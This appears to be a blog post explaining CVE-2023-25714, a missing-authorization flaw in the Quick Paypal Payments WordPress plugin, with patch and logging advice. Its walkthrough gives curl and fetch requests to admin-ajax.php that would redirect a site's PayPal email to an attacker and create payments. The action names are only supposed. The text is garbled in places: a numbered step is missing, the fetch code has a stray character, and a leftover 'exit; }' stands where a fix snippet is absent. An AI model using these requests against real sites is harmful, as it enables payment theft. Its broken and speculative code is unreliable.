CVE-2023-25714 - How Missing Authorization in Fullworks Quick Paypal Payments Can Let Attackers Control Your PayPal Payments

CVE-2023-25714 is a serious security bug that affects the popular Quick Paypal Payments plugin for WordPress. This vulnerability lets attackers take powerful actions—like modifying or initiating PayPal payments—even if they aren’t logged in as admins. If you use this plugin (versions up to 5.7.25), your site might be wide open to abuse until you update.

In this post, I’ll explain what makes CVE-2023-25714 dangerous, show you real code snippets, give you references for the official reports, and walk you through what exploiting it looks like—all in plain English.

What is CVE-2023-25714?

CVE-2023-25714 is a Missing Authorization vulnerability. Basically, certain operations in the Quick Paypal Payments plugin don’t check if the visitor has the right permissions. That means someone who shouldn’t be allowed (for example, any site visitor) can run sensitive tasks. It’s like anyone being able to walk behind a store’s cash register and handle the money.

Affected plugin versions:
Quick Paypal Payments, from “n/a” through 5.7.25 (latest patched: update to 5.7.26+).

This bug is officially listed at several places

- WPScan Advisory CVE-2023-25714
- NVD Entry
- Plugin Page

The Technical Details

Inside the plugin’s code, there are functions (like handling AJAX requests) that are designed to let admins and editors do things—but they are missing the checks to make sure the user is allowed to!

For instance, look inside the plugin’s main file. You might see code like this

add_action('wp_ajax_qpp_some_action', 'qpp_some_action_callback');
add_action('wp_ajax_nopriv_qpp_some_action', 'qpp_some_action_callback');

function qpp_some_action_callback() {
    // NO CHECK to confirm if the user should have this access!
    // This lets ANYONE make payment requests, change options, etc!
    // ... rest of code handles PayPal operations ...
}

See the problem? Instead of checking current_user_can( 'manage_options' ) or a nonce field, the code just runs—meaning anyone can call it, even without logging in.

How Can This Be Exploited?

If an action is exposed without a proper check, any attacker (even a bot or random website visitor) can send an HTTP POST or AJAX request. Here’s what a real-world exploit might look like:

Step-by-Step Exploit Example

Suppose there’s an AJAX action like qpp_save_settings that updates your PayPal account details or payment settings.

1. Find the AJAX URL

WordPress AJAX requests happen at /wp-admin/admin-ajax.php.

You can use curl or a browser tool

curl -d "action=qpp_save_settings&paypal_email=hacker@example.com&currency=USD" \
     https://[victim-site.com]/wp-admin/admin-ajax.php

*Or, using JavaScript:*

fetch('https://victim-site.com/wp-admin/admin-ajax.php';, {
  method: 'POST',
  headers: {'Content-Type': 'application/x-www-form-urlencoded'},
  body: 'action=qpp_save_settings&paypal_email=hacker@example.com&currency=USD'
});

3. The plugin updates your store’s PayPal address

Now, when someone pays for anything, the money goes to the attacker’s account, NOT yours!

Or, if there’s an action to initiate a payment

curl -d "action=qpp_make_payment&amount=999&item=Gift Card" \
     https://[victim-site.com]/wp-admin/admin-ajax.php

An attacker could try to create payment records, refund stuff, or just mess with your order database.

Update ASAP!

The bug was fixed in version 5.7.26.
If you’re on anything lower, upgrade right now!

Download the latest Quick Paypal Payments

Check Your Logs

If you see unfamiliar changes to your PayPal details, or unexplained payment actions, you could have been exploited.

Disable the Plugin If You Can’t Update

If you can’t update right away, *disable it* until you can.

exit;

}

Use WordPress nonces to make CSRF impossible.

- Scan your site regularly with a plugin like Wordfence.

References & More Reading

- WPScan Vulnerability DB Entry for CVE-2023-25714
- National Vulnerability Database (NVD) - CVE-2023-25714
- Plugin Homepage - Quick Paypal Payments
- WordPress Plugin Security Best Practices

In Summary

CVE-2023-25714 is a classic example of an authorization flaw—letting anyone do things only an admin should manage. If you use *Quick Paypal Payments*, check your version and update immediately to stay safe!

*Remember: Keeping plugins updated is the easiest security you can do for your website!*

Timeline

Published on: 12/09/2024 13:15:23 UTC